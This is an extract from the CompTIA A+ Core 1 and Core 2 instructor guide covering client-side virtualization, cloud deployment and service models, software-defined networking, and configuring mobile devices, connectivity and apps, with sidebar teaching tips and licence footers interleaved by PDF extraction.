with legacy 32-bit
Apart from virtualization extensions, multiple CPU resources—whether through code.
multiple physical processors, multi-core, or HyperThreading—will greatly benefit
performance, especially if more than one guest OS is run concurrently.
If the hypervisor is running in a 64-bit environment, 32-bit guest OSs can still be
installed, providing the hypervisor supports them. However, 32-bit hypervisors will not
support 64-bit guest OSs.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
232 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
System Memory
Each guest OS requires sufficient system memory over and above what is required
by the host OS/hypervisor. For example, it is recommended that Windows 10
be installed on a computer with at least 2 GB memory. This means that the
virtualization workstation must have at least 4 GB RAM to run the host and a single
Windows 10 guest OS. If you want to run multiple guest OSs concurrently, the
resource demands can quickly add up. If the VMs are only used for development
and testing, then performance might not be critical, and you may be able to specify
less memory.
Microsoft Hyper-V hypervisor software. This machine is running several Windows and
Linux guest OSs. You can see each is allocated a portion of system memory to use.
(Screenshot used with permission from Microsoft.)
Mass Storage
Each guest OS also takes up a substantial amount of disk space. The VM’s “hard
disk” is stored as an image file on the host. Most hypervisors use a dynamically
expanding image format that only takes up space on the host as files are added
to the guest OS. Even so, a typical Windows installation might require 20 GB.
More space is required if you want to preserve snapshots (the state of a disk at a
particular point in time). This is useful if you want to be able to roll back changes
you make to the VM during a session.
In an enterprise environment, you need not be constrained by the local disk resources
on the host. Disk images could be stored in a high-speed storage area network (SAN).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 233
Networking
A hypervisor will be able to create a virtual network environment through which all
the VMs can communicate and a network shared by the host and by VMs on the
same host and on other hosts. Enterprise virtual platforms allow the configuration
of virtual switches and routers.
Each guest OS must be patched and protected against malware like any other Teaching
OS. Patching each VM individually has performance implications, so in most Tip
environments, a new template image would be patched and tested then deployed
Security concepts
to the production environment. Running security software (antivirus and intrusion such as patching
prevention) on each guest OS can cause performance problems. Virtualization- are covered in more
specific solutions for running security applications through the host or hypervisor detail in Core 2. The
are available. basic terminology of
vulnerabilities and
exploits should be
Ordinary antivirus software installed on the host will NOT detect viruses infecting the
familiar to students
guest OS. Scanning the virtual disks of a guest OS from the host could cause serious from IT Fundamentals,
performance problems. but you may need to
provide additional
background
The process of developing, testing, and deploying VM template images brings about information if students
the first major security concern with the virtual platform itself: rogue VMs (one that have not completed
has been installed without authorization). The uncontrolled deployment of more that course.
and more VMs is referred to as virtual machine sprawl (VM sprawl).
System management software can be deployed to detect rogue builds. More
generally, the management procedures for developing and deploying machine
images need to be tightly drafted and monitored. VMs should conform to an
application-specific template with the minimum configuration needed to run
that application (that is, not running unnecessary services). Images should not be
developed or stored in any sort of environment where they could be infected by
malware or have any sort of malicious code inserted. One of the biggest concerns
here is of rogue developers or contractors installing backdoors or “logic bombs”
within a machine image.
Host Security
Another key security vulnerability in a virtual platform is that the host represents a
single point of failure for multiple guest OS instances. For example, if the host loses
power, three or four guest VMs and the application services they are running will
suddenly go offline.
Hypervisor Security
Apart from ensuring the security of each guest OS and the host machine itself, the
hypervisor must also be monitored for security vulnerabilities and exploits. Another
issue is virtual machine escaping (VM escaping). This refers to malware running
on a guest OS jumping to another guest or to the host. As with any other type of
software, it is vital to keep the hypervisor code up to date with patches for critical
vulnerabilities.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
234 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Client-Side Virtualization
3
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 235
Topic 7B
Summarize Cloud Concepts
4
The cloud makes almost any type of IT infrastructure available for use over the Show
Internet with pay-per-use billing. Most companies make use of at least one cloud Slide(s)
service, and many have moved all of what used to be on-premises server roles to Summarize Cloud
the cloud. In this topic, you will learn to summarize cloud deployment and service Concepts
models. This will help you to support cloud-connected networks and provide
informed advice and support to your users. Teaching
Tip
• Scalability means that the costs involved in supplying the service to more users
are linear. For example, if the number of users doubles in a scalable system,
the costs to maintain the same level of service would also double (or less than
double). If costs more than double, the system is less scalable. Scalability can be
achieved by adding nodes (horizontal/scaling out) or by adding resources to each
node (vertical/scaling up).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
236 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Hybrid is a cloud computing solution that implements some sort of hybrid public/
private/community. For example, a travel organization may run a sales website for
most of the year using a private cloud but “break out” the solution to a public cloud
at times when much higher utilization is forecast. As another example, a hybrid
deployment may be used to provide some functions via a public cloud but keep
sensitive or regulated infrastructure, applications, and data on-premises.
Show
Slide(s)
Common Cloud Common Cloud Service Models
Service Models
As well as the deployment model—public, private, hybrid, or community—
Teaching cloud service models are often differentiated on the level of complexity and
Tip preconfiguration provided. Some of the most common models are infrastructure,
Explain that a service software, platform, and desktop.
model describes what
customers can obtain Infrastructure as a Service
from the cloud. You
might want to mention Infrastructure as a service (IaaS) is a means of provisioning IT resources, such as
that the service servers, load balancers, and storage area network (SAN) components, quickly. Rather
model determines the than purchase these components and the Internet links they require, you deploy
responsibility matrix—
them as needed from the service provider’s datacenter. Examples include Amazon
security in the cloud
versus security of the Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft® Azure® Virtual Machines
cloud. (azure.microsoft.com/services/virtual-machines), and OpenStack® (openstack.org).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 237
Software as a Service
Software as a service (SaaS) is a different model of provisioning software
applications. Rather than purchasing software licenses for a given number of seats,
a business would access software hosted on a supplier’s servers on a pay-as-you-
go arrangement. Virtual infrastructure allows developers to provision on-demand
applications much more quickly than previously. The applications can be developed
and tested in the cloud without the need to test and deploy on client computers.
Examples include Microsoft Office 365® (support.office.com), Salesforce®
(salesforce.com), and Google Workspace™ (workspace.google.com).
Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS
and IaaS. A typical PaaS solution would deploy servers and storage network
infrastructure (as per IaaS) but also provide a multi-tier web application/database
platform on top. This platform could be based on Oracle® or MS SQL or PHP and
MySQL™. Examples include Oracle Database (cloud.oracle.com/paas), Microsoft
Azure SQL Database (azure.microsoft.com/services/sql-database), and Google App
Engine™ (cloud.google.com/appengine).
As distinct from SaaS though, this platform would not be configured to run an
application. Your own developers would have to create the software (the sales
contact or e‑commerce application) that runs using the platform. The service
provider would be responsible for the integrity and availability of the platform
components, but you would be responsible for the security of the application you
created on the platform.
Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS.
(Screenshot courtesy of Amazon.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
238 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Desktop Virtualization
Show Virtual desktop infrastructure (VDI) refers to using VMs as a means of
Slide(s) provisioning corporate desktops. In a typical desktop virtualization solution,
Desktop Virtualization desktop computers are replaced by low-spec thin client computers.
When the thin client starts, it boots a minimal OS, allowing the user to log on
to a VM stored on the company server or cloud infrastructure. The user makes
a connection to the VM using some sort of remote desktop protocol, such as
Microsoft Remote Desktop or Citrix ICA. The thin client must locate the correct
image and use an appropriate authentication mechanism. There may be a 1:1
mapping based on machine name or IP address, or the process of finding an image
may be handled by a connection broker.
All application processing and data storage in the virtual desktop environment (VDE)
or workspace is performed by the server. The thin client computer need only be
powerful enough to display the screen image, play audio, and transfer mouse, key
commands and video, and audio information over the network.
The virtualization server hosting the virtual desktops can be provisioned either as
an on-premises server (on the same local network as the clients) or in the cloud.
This centralization of data makes it easier to back up. The desktop VMs are easier to
support and troubleshoot. They are better locked against unsecure user practices
because any changes to the VM can easily be overwritten from the template image.
With VDI, it is also easier for a company to completely offload their IT infrastructure
to a third-party services company.
The main disadvantage is that during a failure in the server and network
infrastructure, users have no local processing ability. This can mean that downtime
events may be more costly in terms of lost productivity.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 239
It is also important to replicate data within the datacenter to ensure that it can be
provisioned reliably. Storage backing the various XaaS models is offered in cost tiers
that represent how quickly it can be replicated to datacenter availability zones and
between different geographical areas.
Software-Defined Networking
Cloud services require the rapid provisioning and deprovisioning of server instances Show
and networks. This means that these components must be fully accessible to Slide(s)
scripting. Software-defined networking (SDN) is a model for how these processes Software-defined
can be used to provision and deprovision networks. Networking
In the SDN model defined by IETF (datatracker.ietf.org/doc/html/rfc7426), network
Teaching
functions are divided into three layers. The top and bottom layers are application
Tip
and infrastructure:
Do not attempt to
• The application layer applies business logic to make decisions about how traffic go into detail. Just
should be prioritized and secured and where it should be switched. make sure students
understand that
• The infrastructure layer contains the devices (physical or virtual) that handle the this is a capability of
actual forwarding (switching and routing) of traffic. enterprise switches
and routers to allow
The principal innovation of SDN is to insert a control layer between the application them to be configured
via scripting. Explain
and infrastructure layers. The functions of the control plane are implemented by a that an API is the
virtual device referred to as the “SDN controller.” Each layer exposes an application means by which a
programming interface (API) that can be automated by scripts that call functions script or app can
in the layer above or below. The interface between SDN applications and the SDN operate a device or
controller is described as the service interface or as the “northbound” API, while other app.
that between the SDN controller and infrastructure devices is the “southbound” API.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
240 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Cloud Concepts
5
Show 1. A cloud service provides a billing dashboard that reports the uptime, disk
Slide(s) usage, and network bandwidth consumption of a virtual machine. What
Review
type of cloud characteristic does this demonstrate?
Metered utilization.
Teaching
Tip 2. A company has contracted the use of a remote datacenter to offer
Take some time at exclusive access to platform as a service resources to its internal
the end of each topic business users. How would such a cloud solution be classed?
to answer questions.
You can use the As a private deployment model.
review questions
for discussion in 3. A technician provisions a network of virtual machines running web
class or set them for
server, scripting environment, and database software for use by
students to complete
individually during or programmers working for the sales and marketing department. What
after class. type of cloud model has been deployed?
4. When users connect to the network, they use a basic hardware terminal
to access a desktop hosted on a virtualization server. What type of
infrastructure is being deployed?
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 241
Lesson 7
Summary
5
You should be able to summarize aspects of client-side virtualization and cloud Show
computing. Slide(s)
Summary
Guidelines for Supporting Virtualization and Cloud Computing
Teaching
Follow these guidelines to support the use of virtualization and cloud services in Tip
your networks:
Try to include some
• Identify user requirements to run client-side virtualization for a given purpose time at the end
(sandbox, test development, legacy software/OS, cross-platform support). of each lesson to
check students’
• Identify CPU, system RAM, mass storage, and networking resource requirements understanding and
answer questions.
for the host OS and/or hypervisor plus intended guest machines. Ensure that
computers provisioned as virtualization workstations have hardware-assisted
virtualization CPU extensions enabled.
• Document use of hypervisors and VMs and establish a plan to manage and
monitor security requirements, such as patching, blocking rogue VM sprawl, and
preventing VM escaping.
• Given security requirements and costs, determine the best cloud deployment
model from public, private, community, and hybrid.
• Evaluate cloud service providers to ensure that they meet criteria for reliable
and responsive cloud delivery characteristics, such as metered utilization, rapid
elasticity, high availability, and file synchronization.
• Assess requirements for cloud service models, such as IaaS, SaaS, PaaS, and VDI.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 8
Supporting Mobile Devices
1
LESSON INTRODUCTION
This lesson focuses on mobile devices and how they differ from desktop systems Show
in terms of features, upgrade/repair procedures, and troubleshooting. As a Slide(s)
certified CompTIA® A+® technician, you will be expected to configure, maintain, Objectives
and troubleshoot laptops, smartphones, and tablets. With the proper information
and the right skills, you will be ready to support these devices as efficiently as you Teaching
support their desktop counterparts. Tip
The final section of
Lesson Objectives the course focuses
on the device types
remaining after
In this lesson, you will: PCs and network
• Set up mobile devices and peripherals. hardware. This lesson
focuses on portable
• Configure mobile device apps. devices, including
smartphones, tablets,
• Install and configure laptop hardware. and laptops.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
244 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 8A
Show
Slide(s)
Set Up Mobile Devices and Peripherals
Set Up Mobile Devices 2
and Peripherals
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 245
You need to distinguish between refresh rate and response time when evaluating
displays. Refresh rate is the speed at which the whole image is redrawn, measured in Hz.
The refresh rate should be a multiple of the video source frame rate. Response time is
the time taken for a pixel to change color, measured in milliseconds (ms).
• In-plane switching (IPS) uses crystals that rotate rather than twist. The main
benefit is to deliver better color reproduction at a wider range of viewing angles.
Most IPS panels support 178/178 degree horizontal and vertical viewing angles.
The main drawback of early and cheaper IPS screens is slightly worse response
times. A high-quality IPS display will usually be the best TFT option for both
gaming and graphics/design work, however, as it will be capable of similar
response times to TN while retaining better color reproduction and viewing
angles.
• Vertical alignment (VA) uses crystals that tilt rather than twist or rotate.
This technology supports a wide color gamut and the best contrast-ratio
performance. Contrast ratio is the difference in shade between a pixel set to
black and one set to white. For example, where a high-end IPS panel might
support a 1200:1 contrast ratio, a VA panel would be 2000:1 or 3000:1. However,
viewing angles are generally not quite as good as IPS, and response times are
worse than TN, making a VA panel more prone to motion blur and ghosting.
Early types of laptop display used a cold cathode fluorescent (CCFL) bulb as a backlight.
The bulb requires AC power, so an inverter component is used to convert from the DC
power supplied by the motherboard to the AC power for the bulb. This type of panel is
no longer in mainstream production, but you might come across older laptop models
that use it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
246 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 247
Some laptops are based on tablet hybrid form factors where the touch screen
display can be fully flipped or rotated between portrait and landscape orientations.
Another approach, used on Microsoft's Surface tablet/laptop hybrids, is for the
keyboard portion of the laptop to be detachable and for the screen to work
independently as a tablet.
Use the Settings app in Windows 10 to configure touchpad settings, such as sensitivity,
tap events, and gestures. (Screenshot courtesy of Microsoft.)
• Trackpad can be used to mean the same thing as touchpad, but it is often used
to mean a larger-format device attached as a peripheral.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
248 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A touch device can require careful configuration to set up gesture support, calibrate
to the screen area, and adjust sensitivity. This might be performed via OS settings
or by installing a driver or app for the device.
Touch Pens
Most drawing pads and some touchscreens can be used with a touch pen or stylus
rather than fingers. A stylus allows for more precise control and can be used for
handwriting and drawing. This functionality is often referred to as natural input.
Touch pens are available in a wide range of sizes, from small styluses designed for
use with smartphones to full-size pens designed for use with tablet touchscreens
and dedicated graphics pads. Touch pens designed for use with drawing pads have
removable and changeable nibs for use as different pen/brush types with digital art
applications.
A digitizer may only be compatible with a specific touch pen model or range. Capacitive
touch pens should work with most touch screen types. Drawing pads often use more
sophisticated active pens with better support for pressure sensitivity, nib angles, palm
rejection (ignoring the user’s palm if it is resting on the pad), and additional input
controls, such as switching between drawing and eraser functions.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 249
Wi-Fi Networking
Every laptop, smartphone, and tablet supports a Wi-Fi radio. On a smartphone or Show
tablet, the indicator on the status bar at the top of the screen shows the data link in Slide(s)
use as the current Internet connection method. A device will usually default to Wi-Fi Wi-Fi Networking
if present and show a signal strength icon.
Teaching
Enabling and Disabling Wi-Fi Tip
Ask learners why they
Each type of wireless radio link can be toggled on or off individually using the might want or need
Control Center (swipe up from the bottom in iOS) or notification shade (swipe down to turn Wi-Fi or cell
from the top in Android). For example, you could disable the cellular data network network connections
while leaving Wi-Fi enabled to avoid incurring charges for data use over the cellular on and off. Reasons
might include being on
network. You can use the Settings menu to choose which network to connect to or
an airline that doesn’t
to configure a manual connection to a hidden SSID. allow cell phone use,
being in a corporate
environment where
cell phones are not
allowed to connect to
the wireless network,
and forcing the device
to use one network or
the other when both
are available.
Using Android to join a Wi-Fi network (left). The device's network address can be checked
using the Advanced Settings page (right). (Screenshot courtesy of Android platform,
a trademark of Google LLC.)
Airplane Mode
Most airlines prohibit passengers from using radio-based devices while on
board a plane. A device can be put into airplane mode to comply with these
restrictions, though some carriers insist that devices must be switched off
completely at times, such as during take-off and landing. Airplane mode disables
some or all of the wireless features (cellular data, Wi-Fi, GPS, Bluetooth, and NFC),
depending on the device type and model. On some devices, some services can
selectively be re-enabled while still in airplane mode.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
250 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
iOS iPhone (left) and Android phone (right) with Airplane (Aeroplane) mode enabled.
(Screenshots reprinted with permission from Apple Inc., and Android platform,
a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 251
• Code Division Multiple Access (CDMA) means that the handset is directly
managed by the provider and there is no removable SIM card. CDMA adoption is
largely restricted to the telecom providers Sprint and Verizon. Information that
the cellular radio needs to connect to the network is provided as a preferred
roaming list (PRL) update. A PRL update can be triggered from the device’s
Settings menu or by dialing a special code, such as *228.
• Long Term Evolution (LTE) 4G and 5G standards have removed this distinction.
All 4G and 5G cellular data connections require a SIM card. Devices with SIM
cards do not require the PRL to be updated manually.
• H/H+—High Speed Packet Access (HSPA) provides improved “3.75G” data rates
on GSM networks. Nominally, HSPA+ can work at up to 42 Mb/s, but real-world
performance is likely to be lower.
• 5G—Real-world speeds are nowhere near the hoped-for 1 Gb/s rate, ranging
from about 50 Mb/s to 300 Mb/s at the time of writing.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
252 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 253
Configuring mobile hotspot settings (left), then enabling it (right). In this figure, hosts can connect
to the "hippo" network and use the device's cellular data plan to get Internet access.
(Screenshot courtesy of Android platform, a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
254 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Configuring tethering on an Android phone. The device in this figure is connected to the PC
over USB, but you could use Bluetooth too. (Screenshot courtesy of Android platform,
a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 255
Serial Interfaces
Serial is one of the oldest and simplest computer interfaces. While not many
mobile devices have hardware serial ports, the software serial port is often used
for programming and connectivity with some types of peripheral device. The serial
software interface is called a universal asynchronous receiver transmitter
(UART) port. On Android, UART interface data can be transferred over a USB
hardware port or over Bluetooth. Apple devices do not allow direct connections to
UART over the Lightning connector, except through enrollment in the developer
program.
Another use for a serial interface is to connect a laptop to the serial port of a managed
switch or router. As most laptops no longer have 9-pin RS-232 hardware ports, these
connections use special adapter cables that connect to a USB or RJ45 port on the laptop.
Enabling Bluetooth on an Android device. In this figure, the Android device is named
"COMPTIA-MOBILE." "COMPTIA" is a nearby Windows PC with Bluetooth enabled.
(Screenshot courtesy of Android platform, a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
256 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Enable Pairing
To connect via Bluetooth, the Bluetooth radio on each device must be put into
discoverable or pairing mode. Opening the settings page makes the device
discoverable. In iOS, Bluetooth devices are configured via Settings > General >
Bluetooth (or Settings > Bluetooth, depending on the iOS version). In Android,
you can access Bluetooth settings via the notification shade. In Windows, you can
manage Bluetooth Devices using the applet in Control Panel or Windows Settings
and the Bluetooth icon in the notification area.
The settings page will show a list of nearby Bluetooth-enabled devices that are
also in discoverable mode. Select a device to proceed. The pairing system should
automatically generate a passkey or PIN code when a connection request is
received. Input or confirm the key on the destination device, and accept the
connection.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 257
NFC allows a mobile device to make payments via contactless point-of-sale (PoS)
machines. To configure a payment service, the user enters their credit card
information into a wallet app on the device. The wallet app does not transmit the
original credit card information, but a one-time token that is interpreted by the card
merchant and linked back to the relevant customer account. There are three major
wallet apps: Apple Pay, Google Pay (formerly Android Pay), and Samsung Pay. Some
PoS readers may only support a particular type of wallet app or apps.
On an Android device, NFC can be enabled or disabled via settings. With most
wallets, the device must be unlocked to initiate a transaction over a certain amount.
NFC can also be used to configure other types of connection, such as pairing
Bluetooth devices. For example, if a smartphone and headset both support NFC,
tapping the headset will automatically negotiate a Bluetooth connection.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
258 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 259
Docking stations with media bays and adapter card support are no longer common.
Often, the term “docking station” is just used to mean port replicator.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
260 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Mobile Devices and Peripherals
3
Teaching
1. A company is ordering custom-built laptops to supply to its field sales
Tip
staff for use predominantly as presentation devices. The company can
Take some time at specify the type of panel used and has ruled out IPS and OLED on cost
the end of each topic
to answer questions.
grounds. Which of the remaining mainstream display technologies is
You can use the best suited to the requirement?
review questions
for discussion in Vertical alignment (VA) displays support good viewing angles and high-contrast
class or set them for ratios, which makes them well-suited to displaying slides to an audience. The
students to complete twisted nematic (TN) type is cheap but does not support wide-angle viewing.
individually during or
after class. 2. You are writing a knowledge base article for remote sales staff who need
to use their smartphones to facilitate Internet connectivity for their
laptops from out-of-office locations. What distinguishes the hotspot and
tethering means of accomplishing this?
Configuring a hotspot allows the laptop to connect to the smartphone over Wi-Fi.
Tethering means connecting the laptop via USB or Bluetooth.
For Apple devices, the Lightning port. For Android, it will be USB-C.
On the smartphone, open the Bluetooth page under Settings. This will make the
phone discoverable and enable the user to find nearby devices. If the headset
is not found automatically, check if there is a button on the headset to make it
discoverable.
Near-field communications (NFC) allow the user to touch the phone to a point-of-
sale terminal to authorize payment in conjunction with a wallet app.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 261
Topic 8B
Configure Mobile Device Apps Show
Slide(s)
Configure Mobile
6
Device Apps
CORE 1 EXAM OBJECTIVES COVERED
Teaching
1.4 Given a scenario, configure basic mobile-device network connectivity and
application support. Tip
This topic covers
accounts and data
Supporting mobile devices also involves supporting the apps that run on them. synchronization plus
In this context, it is important to realize that the use of mobile devices within features for enrolling a
companies can raise support and security challenges. Some companies allow device on a corporate
network.
employees to use personal devices; others allow personal use of company-supplied
devices. In these scenarios, policies and controls must be used to protect the
confidentiality and integrity of workplace data and the privacy of a user’s personal
data.
Mobile Apps
An app is an installable program that extends the functionality of the mobile device. Show
An app must be written and compiled for a particular mobile operating system. For Slide(s)
example, an app written for Apple iOS cannot directly be installed on Android. The Mobile Apps
developer must make a version for each OS.
Teaching
iOS Apps Tip
Check that students
In iOS, apps are distributed via Apple’s App Store. Apps must be submitted to and are familiar with the
approved by Apple before they are released to users. This is also referred to as features of the store
the walled garden model and is designed to prevent the spread of malware or code distribution models
that could cause faults or crashes. Apps can use a variety of commercial models, used by smartphones
and tablets.
including free to use, free with in-app purchases, or paid-for.
Third-party developers can create apps for iOS using Xcode, which is Apple's
integrated development environment (IDE), and the programming language Swift.
Xcode can only be installed and run on a computer using macOS.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
262 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Apple's App Store and app permission settings. This app is already installed, but an update
is available. (Screenshot reprinted with permission from Apple Inc., and WhatsApp.)
Android Apps
Android's app model is more relaxed, with apps available from both Google Play
and third-party sites, such as Amazon's app store. The Java-based IDE, Android
Studio, is available on Linux, Windows, and macOS.
Use the Play Store to install an app (left), grant the app permissions (middle),
and review permissions and other settings (right). (Screenshots courtesy of
Android platform, a trademark of Google LLC., and WhatsApp.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 263
Permissions
On both iOS and Android, apps are suppose to run in a sandbox and have only the
privileges granted by the user. An app will normally prompt when it needs to obtain
permissions. If these are not granted, or if they need to be revoked later, you can
do this via the app's Settings page.
Account Setup
Most mobile devices are designed to be used by a single user. The owner’s user Show
account is configured when the device is used for the first time (or re-initialized). Slide(s)
This account is used to manage the apps installed on the device by representing Account Setup
the user on the app store. iOS requires an Apple ID, while an Android device
requires either a Google Account or a similar vendor account, such as a Samsung Teaching
Account. This type of account just requires you to select a unique ID (email address) Tip
and to configure your credentials (pattern lock, fingerprint, face ID, and so on). Explain the difference
Accounts can also be linked to a cellphone number or alternative email address for between the owner
verification and recovery functions. account (manages
the device and
As well as managing the app store, the owner account can be used to access linked to the store)
various services, such as an email account and cloud storage. However, the device and accounts that
owner might want to use multiple other accounts or digital identities in conjunction represent digital
identities for individual
with different apps. These accounts allow app settings and data to be synchronized
apps. Some apps (such
between multiple devices. For example, a user can access his or her contacts list as email/contact/diary
from both his or her mobile device and his or her laptop computer. Some examples management) can
of these services include: be linked to multiple
subaccounts.
• Microsoft 365—A Microsoft digital identity is used to access cloud subscriptions
for the Office productivity software suite and the OneDrive cloud storage
service. Microsoft identities use the @outlook.com domain by default but can
be registered with a third-party address also.
The device owner can set up sub-accounts for services not represented by their
Apple ID or Google Account, such as a corporate email account. Each app can set
up a subaccount too. For example, the device might have accounts for apps such as
Facebook or LinkedIn.
Account settings allow you to choose which features of a particular account type are
enabled to synchronize data with the device. You can also add and delete accounts
from here.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
264 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Contacts
A contact is a record with fields for name, address, email address(es), phone
numbers, notes, and so on. One issue with contacts is that people tend to create
them on different systems, and there can be issues matching fields or phone
number formats when importing from one system to another using a file format
such as comma separated values (CSV). vCard represents one standard format and
is widely supported now. Maintaining a consistent, single set of contact records is
challenging for most people, whatever the technology solutions available!
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 265
Calendar
A calendar item is a record with fields for appointment or task information, such
as subject, date, location, and participants. Calendar records have the same sort
of sync issues as contacts; people create appointments in different calendars and
then have trouble managing them all. Calendar items can be exchanged between
different services using the iCalendar format.
Mail
Most email systems store messages on the server, and the client device is used to
manage them. There can often be sync issues, however, particularly with deletions,
sent items, and draft compositions.
Apps
An app will be available across all devices that the account holder signs in on, as
long as they are the same platform. If you have a Windows PC and an Apple iPhone,
you will find yourself managing two sets of apps. Most of them will share data
seamlessly, however (the social media ones, for instance).
Passwords
Both iOS and Android will prompt you to save passwords when you sign in to apps
and websites. These passwords are cached securely within the device file system
and protected by the authentication and encryption mechanisms required to access
the device via the lock screen.
These cached passwords can be synchronized across your devices using cloud
services. You must remember that anyone compromising your device/cloud
account will be able to access any service that you have cached the password for.
Teaching
Tip
An autodiscover-
enabled service can be
configured with just
the email address and
password.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
266 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 267
If you are connecting to an internet service provider (ISP) email host or corporate
mail gateway that does not support autodiscovery of configuration settings,
you can enter the server address manually by selecting Other, then inputting the
appropriate server addresses:
• Incoming mail server—the FQDN or IP address of the Internet Mail Access
Protocol (IMAP) or Post Office Protocol (POP3) server.
Choose IMAP if you are viewing and accessing the mail from multiple devices. POP3
will download the mail to the device, removing it from the server mailbox. Note
